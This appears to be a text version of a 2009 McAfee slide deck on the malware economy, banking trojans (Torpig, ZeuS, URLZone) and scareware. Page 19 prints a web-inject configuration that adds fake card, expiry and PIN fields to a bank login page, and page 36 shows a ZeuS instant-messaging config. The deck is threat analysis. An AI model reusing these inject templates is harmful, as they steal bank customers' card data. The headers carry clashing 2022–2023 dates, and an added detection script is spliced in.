091209 Mc Afee Roundtable

October 30, 2022

Page 1: 091209 Mc Afee Roundtable

April 10, 2023

Malware - Threats, Trends, Developments

Toralv Dirro, McAfee Avert Labs EMEA Security Strategist

Page 2

Current weather report

Page 3

Worldwide at the Avert Labs:

• Currently $zu_grosse_Zahl ("too large a number") different pieces of malware identified by Avert Labs

• We have stopped counting; the old method no longer makes sense:

• 50,000+ samples are analysed every day

• 95% and more are static (not self-replicating) – Trojans and bots

• 90% and more are packed/encrypted – "runtime packers"

Page 4

Total number of samples

Source: AV-Test.org

Page 5

Global Malware Vision (Cumulative)

• Collections: The Great Zoo

Q1-2009: +4.2 million samples
Q2-2009: +4.1 million samples

Page 6

Self-replicating and static malware

[Chart: percentage share (0% to 100%) of self-replicating versus static malware, by year 1999 to 2008]

Page 7

Rootkits are becoming the rule, not the exception

Detection Name    Total
Backdoor-AWQ      64927
W32/Nuwar@MM      16188
Downloader-BAI     4213
Backdoor-CKB       1077
Backdoor-BAC        834

Page 8

Motivation yesterday

Page 9

Motivation today

Source: chat interview with the "Dream Coders Team", the developers of MPack: http://www.robertlemos.com/2007/07/23/mpack-interview-chat-sessions-posted/

Page 10

Today's Threat Landscape

• 500% increase in malware code added from 07 - 08 – More Malware Variations

• 80% of malware is obfuscated – Toolkits & Obfuscation

• A new malicious website detected every 60 seconds – Web 2.0 is the Catalyst!

• 90% of all threats are financially motivated

• 5m active new zombies per month – Attack Target: Users vs. Machines

Page 11

Public trading platforms

Page 12

And the sad result

Page 13

The underground marketplace

Bank Logons

• A Washington Mutual Bank account in the U.S. with an available balance of $14,400 is priced at 600 euros ($924), while a Citibank UK account with an available balance of 10,044 pounds is priced at 850 euros ($1,310).

• It may appear to be less dangerous to resell access to a bank account rather than to use it directly.

Page 14

The tools

Page 15

The Malware Toolkit Marketplace

Crimeware (Author) – Description – Pricing

• FirePack (Diel)
– Web Exploitation Malware Kit. Note: a Chinese version exists.
– $3000 (February 2008); $300 (April 2007)

• Zupacha, ZeuS and ZUnker ($ash)
– The ZeuS trojan is able to inject code into the login web page of a financial organization to ask for personal data and divert it to a remote location. Zupacha is a bot element, and Zunker a C&C.
– $1000 for Zupacha, $2000 for Zunker (January 2008)

• Adrenaline, an update of Nuclear Grabber (Corpse)
– Universal kit for creating tools to capture targeted banking data. Able to intercept and retransmit authentic transactions on the fly between the bank and its client.
– $3000

• PolySploit, an update of NeoSploit (Grabarz)
– Web Exploitation Malware Kit, statistical engine, enhanced configuration capability, exploitation package, enhanced support and online forum for customers.
– 100 €

• El fiesta
– Web based and PDF exploit pack used to launch attacks and monitor them.
– $850 (December 2008)

• Turkojan RAT (AlienSoftware)
– A Remote Access Tool made in Turkey.
– Bronze edition: $99 (July 2008); Silver edition: $179; Gold edition: $249

• ZoPack
– Web based PDF exploit pack used to launch attacks and monitor them.

Source: McAfee Avert Labs

Page 16

CaaS – Crimeware as a Service

Service – Description – Prices Encountered

• Proxy Rental
– Botnet networks on "per use" (on a monthly basis) or "daily rate" (on a daily basis, over a month) plans.
– Daily Limit 50, Qty per Month 1500: $95; Per Use Plan, Qty per Month 1000: $69.95

• Web Injection Shop
– HTML injection codes designed to steal information from customers of dozens of financial institutions worldwide. Each HTML injection is specifically tailored to match each bank's specific website design.
– Each between $10 and $30

• Spam facilities
– Spamming tools, mailing lists, etc.
– 5000/7000 emails per minute, over 1 million emails per day: $2000 per month

• Botnet management
– HTTP Command & Control facilities for ZeuS malware.
– $50 per month

• Flooding/DDoS
– Complete paralysis of your competitor by flooding his stationary or mobile phone, or his web site.
– $80 per 24h; 1 hour: $20; 1 day: $100; Large projects: $200

Source: McAfee Avert Labs

Page 17

Hacking passwords? What for??!

Page 18

Shark: Compilable multi system back door Trojan

Page 19

Example of a configuration file

<inject
  url="citibank.com"
  before="name=password></TD></TR>"
  what="
    <TR><TD colspan=3 class=smallArial noWrap></TD></TR>
    <TR><TD colspan=3 class=smallArial noWrap>
    <SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>
    <TR><TD colspan=3 class=smallArial noWrap></TD></TR>
    <TD noWrap colSpan=2><B>Your ATM or Check Card Number:</B></TD>
    <TD class=smallArial noWrap align=right></TD></TR>
    <TD class=username colSpan=3><INPUT id=cc type=text maxlength=16 size=16 value='' name=cc></TD></TR>
    <TD noWrap colSpan=2><B>Expiration Date:</B></TD>
    <TD class=smallArial noWrap align=right>(e.g. 07.2007)</TD></TR>
    <TD class=username colSpan=3><INPUT id=expdate type=text maxlength=7 size=7 value='' name=expdate></TD></TR>
    <TD noWrap colSpan=2><B>ATM PIN:</B></TD>
    <TD class=smallArial noWrap align=right></TD></TR>
    <TR>
    <TD class=username colSpan=3><INPUT id=pin type=password size=4 maxlength=4 value='' name=pin></TD></TR>
  "
  block="sign-on."
  check="pin"
  quan="4"
  content="d"
>
</inject>

Page 20

• The user is on their bank's web site

• The SSL certificate is valid, the padlock is displayed

• Torpig injects a form into the browser that asks for additional information – in the same style as the web site
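As an added example (not from the presentation): a defender-side integrity check that compares the input fields actually present in a rendered login page with the fields the bank's genuine form is known to have, using only Python's standard library. The sample HTML, the assumed field names userid/password and the function names are constructed for this example; the injected rows mirror the cc/expdate/pin inputs of the configuration file above.

```python
from html.parser import HTMLParser


class _InputCollector(HTMLParser):
    """Records (name, type) for every <input> element in the document."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":  # HTMLParser lower-cases tag and attribute names
            a = dict(attrs)
            self.inputs.append((a.get("name") or "", (a.get("type") or "text").lower()))


def collect_inputs(html):
    parser = _InputCollector()
    parser.feed(html)
    parser.close()
    return parser.inputs


def unexpected_inputs(html, expected_names):
    """Input names in the rendered page that the genuine form never contains."""
    expected = {n.lower() for n in expected_names}
    return [name for name, _ in collect_inputs(html) if name.lower() not in expected]


def password_field_count(html):
    """A genuine login form has one password-type field; the inject adds a second (the PIN)."""
    return sum(1 for _, kind in collect_inputs(html) if kind == "password")


# Constructed sample pages (hypothetical, not captured from any bank site).
GENUINE_LOGIN = """
<TR><TD>User ID</TD><TD><INPUT type=text name=userid size=16></TD></TR>
<TR><TD>Password</TD><TD><INPUT type=password name=password size=16></TD></TR>
"""
# The extra rows mirror the cc/expdate/pin inputs of the inject configuration.
INJECTED_ROWS = """
<TR><TD colspan=3><SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>
<TR><TD colSpan=3><INPUT id=cc type=text maxlength=16 size=16 value='' name=cc></TD></TR>
<TR><TD colSpan=3><INPUT id=expdate type=text maxlength=7 size=7 value='' name=expdate></TD></TR>
<TR><TD colSpan=3><INPUT id=pin type=password size=4 maxlength=4 value='' name=pin></TD></TR>
"""
# The inject is anchored "before" the password row, so splice the rows in there.
INJECTED_LOGIN = GENUINE_LOGIN.replace("<TR><TD>Password", INJECTED_ROWS + "<TR><TD>Password")
EXPECTED_FIELDS = {"userid", "password"}  # assumed field list of the genuine form

if __name__ == "__main__":
    print(unexpected_inputs(INJECTED_LOGIN, EXPECTED_FIELDS))  # ['cc', 'expdate', 'pin']
    print(password_field_count(INJECTED_LOGIN))                # 2
```

Because the inject rides inside the browser after TLS has been terminated, this kind of check has to run on the rendered DOM (or on a copy of the page the bank serves itself for comparison), not on the certificate or the transport.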

Page 21

Delivery

Page 22

Email attachments – still common

Page 23

Spear Phishing: “Whaling”

“The United States Tax Court has received many telephone calls regarding an e-mail which purports to originate from the Court being sent by a member of the Tax Court’s practitioner bar. This message is an example of “Spear Phishing,” which is an e-mail spoofing attempt that targets a specific organization. The Tax Court is not disseminating any e-mail notice to anyone who currently has a case before this Court.”

Page 24

Web 2.0

Emails are being replaced by links in social networks

Page 25

Koobface gets past the content filter… exploits trust

Page 26

Autorun worms

Largely ignored – until Conficker came along
Page 27

Autorun is a significant infection vector today

Page 28

Anatomy of an attack: Torpig botnet

1. The victim system sends GET / to a web server with a security hole.

2. The server returns an <iframe>.

3. GET /?gnh5 (request JS code) to the Mebroot drive-by-download server.

4. Launches exploits; gnh5.exe downloaded; installs Mebroot, injects DLL.

5. Mebroot C&C server.

6. Torpig DLLs injected into IE, Firefox, Outlook, Skype, IM, etc. – the victim system becomes a bot.

7. Torpig C&C server: stolen data uploaded every 20 min.

8. Config file containing bank domains and new C&C servers; 300 domains for target FIs.

9. Injection server URL.

10. Phishing HTML, every 2 hours.

Page 29

ZeuS - "human" MITM – Step 1

Maintenance, please wait…

Page 30

ZeuS - "human" MITM – Step 2

For security, a little maths…

Page 31

ZeuS - "human" MITM – Step 3

Just to be safe, your mobile phone number please

Page 32

ZeuS - "human" MITM – Step 4

Confirm with iTAN 10

Page 33

ZeuS - "human" MITM – Step 5

Successfully added (for whatever purpose)

Page 34

ZeuS - "human" MITM – Step 6

Unfortunately closed today due to maintenance work

Page 35

ZeuS - “human” MITM Admin Panel

Page 36

ZeuS – with instant messaging

ZeuS Jabber add-on

[im]
server=jabber.ru
username=glom***
password=qazx*****
to=thekl***@jabber.ru
to1=icq12***@jabber.ru
to2=tank56***@jabber.ru
; name=mask; mask
[keylist]
;key1="login="
key2="injtoken="
key3="inja1="
[list]
;test1=*onlineeast*.bankofamerica.com*

Page 37

Malware / Crimeware

• URLZone

– The Trojan calls back to its command and control server for specific instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send the money. Then it forges the victim's on-screen bank statements so the person and the bank don't see the unauthorized transaction.

http://vil.nai.com/vil/content/v_237377.htm (Downloader-BQZ.a)

http://www.darkreading.com/database_security/security/client/showArticle.jhtml?articleID=220300592

This statement shows a transaction of 53.94 Euros when actually 8,571.31 Euros was removed from the account. The balance has been changed by the Trojan. (http://www.geek.com/articles/news/malware-now-covers-its-tracks-in-bank-statements-20090930/)

Page 38

Is Your Computer Infected (by a Fake Anti-Virus)?

[Chart: quarterly figures, labelled Q1, Q2, Q3]

Page 39

They Are Popular Because They Work and Look Valid

Page 40

People and Economy behind it

Page 41

Page 42

Good at Crime, Clueless about Security

• Goal: Tracking distribution sites

• Discovered: Everything

– "Product lists"

– Tech Support Calls

– Project Documentation

– Affiliate Lists

– Sourcecode

– Employee lists

– And much more....

Page 43

FOCUS 09: Anatomy of a scareware company

http://www.internetnews.com/security/article.php/3842936/McAfee+FOCUS+09+Anatomy+of+a+Scareware+Scam.htm

Using more than 63 gigabytes of information culled from querying the company's own portal servers and other publicly available data, Dirk Kollberg, from McAfee Labs, unearthed some astonishing operational details including the following:

• Innovative Marketing used more than 34 different production servers in less than six months and used as many as six different servers at a time to infect, advertise and sell their illicit wares.

• In one 10-day stretch, the company received more than 4 million download requests, meaning that at least 4 million people tried to buy the worthless applications.

• Internal documents report that the URLs used to hawk the scareware are only valid for 15 minutes, making it all but impossible for federal, state or international law enforcement agencies to yank the offending URLs before they've moved on to new addresses.

• It used multiple customer call centers, including at least one in Poland and one in India, to service unsuspecting customers calling via VoIP connections to buy, remove or question the need for the unnecessary scareware. And, believe it or not, they recorded and saved these bogus customer service calls. More incredibly, 95 percent of callers were "happy" when the call concluded.

• Because they needed an extensive network of ISPs to pull off the scam, Innovative Marketing kept detailed spreadsheets with all the ISPs' pertinent data including price, location and, most telling, a column that rated the ISPs' "abuseability"—essentially an assessment of which ISPs would play ball and not ask questions as they went about their business.

• The company added a whopping 4.5 million order IDs, essentially new purchases, in 11 months last year. With most of the phony applications selling for $39.95, that's more than $180 million in less than a year.

Page 44

Questions? More info?

• Read the Avert Labs Security Blog – http://www.avertlabs.com/research/blog

• Listen to the AudioParasitics Podcast – http://www.audioparasitics.com

• Read the Monthly Spam Report – http://www.mcafee.com

• Read the McAfee Quarterly Threat Report – http://www.mcafee.com

• Read the McAfee Security Journal – http://www.mcafee.com

• Watch the Stop H*Commerce Series – http://www.stophcommerce.com

Page 45